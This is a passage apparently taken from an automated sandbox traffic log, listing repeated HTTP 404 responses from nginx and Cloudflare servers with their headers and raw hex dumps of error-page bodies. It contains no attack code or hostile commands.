97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:59:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:59:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 16:00:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lUEs8u8cUKYLHO0tlo36AeJ%2BT7dMCOVhBRDZpYIvfooVSAK%2B1qIMzZSoqk1i%2FMpR0BXfAExU0onUl7hjD704kr3MajcD873F%2BS6O%2BZPvXVCrLJo15wfqH5ng7DTpgUELOmlG2M0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e44f0dd47290-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1841&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=610&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 16:00:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IaUwWekTgEj7%2BAUwPuQjj%2BAQ4oXybfCwNnrHdOsIwe%2FpeoJSOOuOpCyasfDtVDEs%2BzPKoccV2SEoylEJncXWdFEo7njuHG%2BwoAooORPlvtDoBUEWzNxEp1lJshgt7VAUIptFcJg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e45e3a537cf4-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=630&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 16:00:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BC71uhOBDL1cBwtKbLoXJ2WFTanY4EHZWTozwTZHgTKg5kTaDxq30sw9EIqHszfhqx8oABvXNmS08FAuphHGKy5f0CtJSwM5OMzK4AC%2BQn5NpIJHVtaoeIau6GRqK9svoO5lEGs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e46f190142f8-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1627&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10712&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 16:00:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TLXuM0H0vCB2WAMRGO5Sfv5AAAyZigRVv%2F8qI3tCgl%2FrBvo7uvHpf%2F2m4Zp9aOFEUFSkuy2egxOMghctO3jTA6u3uNZwUMbm6TLuY75m8NH4k6SxeS7tsliqn%2FpXRHFlqzlTeNM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e47ffa505e76-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1599&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=348&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 16:00:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6kRaFaoLR0dbZ5qxvIBk%2FCG12atO29A0VNI%2Fj0pM%2FqZntv5uUcYhL68Jv8MwOiVuL6%2F964PXWEAfmQ4qWD%2FJXFxo9lsVGR9zfn1%2BS59yZvtBChAVDcdsNij9V0PaIEb6GrVmwlpiTvMX%2Ficg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e4aa498372a1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2020&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=631&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 16:00:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPMe9KbSb%2B8T7JDQc1zPkSvxToRZUlV1j0mqWIaL0qoEO5l3LsLhx8tJOgTw6MgMBHl%2Fm5Vc94DaqQuwYSvbR%2FGd%2B6ApnaHFtSsG30zLAwuzdRT4WIfQGB4%2Fj7cboYyI1EVBD%2BHQKkxdwMAC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e4bb2c700cd9-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1713&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=651&delivery_rate=0&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 16:00:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAYh77uJSDRf2tZ60yWhM4XtMIYAVPuczwaFLZyfTM8q8o%2BjzoaV7zMxH5c7p4RzJLlLgT91KMgTum3ylV3a8UVx9gpLgMAnclNhxfwl9BJ7R3hOAR2DaZtBD6MCMgTPR5qsna5YRAEevGDl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e4cb5dc142dd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2133&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10733&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 16:00:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZKHMW50wIECu3rQv9UNsnAo6W2rExEmNdEYLtjCRwITP71zS%2FtmcDY6jG1o0%2BFY0Dn6830cTRMlIunNhiu2je%2Fua9qXWvGsd02jSu2UCTGVX9NVQRYCGkpTLTrN9%2FDFpDr0d23UAQAQb6SWv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e4dc5fe04414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2038&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=355&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 